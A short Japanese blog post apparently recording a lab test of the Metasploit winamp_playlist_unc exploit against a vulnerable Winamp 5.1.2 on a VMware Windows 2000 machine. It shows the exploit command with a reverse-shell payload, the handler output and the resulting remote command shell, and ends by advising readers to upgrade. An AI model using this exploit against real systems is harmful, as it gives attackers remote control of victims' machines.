winamp_playlist_uncを試してみた

  • winamp_playlist_uncを試してみました

(実行環境)
WindowsXP SP2 + Metasploit Framework 2.5


(PC)
Windows 2000 server SP4(vmware) + winamp 5.1.2

  • exploitsを実行すると、httpサーバとなります

msf winamp_playlist_unc(win32_reverse_stg) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.1:8080/

  • 脆弱性のあるwinampがインストールされたPCがアクセスしてくると、「One second please」と書かれたページが表示され、Winampが起動してきます



  • あとは、PC側からセッションが張られてきて・・ ガクガク(((( ;゚Д゚))))ブルブル

[*] HTTP Client connected from 192.168.1.100:1326, sending 296 bytes of payload.
..
[*] Got connection from 192.168.1.1:4321 <-> 192.168.1.100:1328
[*] Sending Stage (143 bytes)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\Winamp>netstat -an | find "192.168.1.1"
netstat -an | find "192.168.1.1"
TCP 192.168.1.100:1316 192.168.1.1:139 ESTABLISHED
TCP 192.168.1.100:1328 192.168.1.1:4321 ESTABLISHED

C:\Program Files\Winamp>

  • リバースシェル以外にも任意のコマンドが実行できたりします
  • ってことで、バージョンアップしましょう ヽ(´ー`)ノ
  • ついでに脆弱性のあるWinampをインストールしている状態で怪しげなサイトへはアクセスしないようにしましょうw

●2006/02/06 追記

●2006/02/16 追記

  • 5.1.3でもまだ問題あり・・
  • 少しの変更でいけるみたい

New winamp m3u/pls .WMA & .M3U Extension overflows

><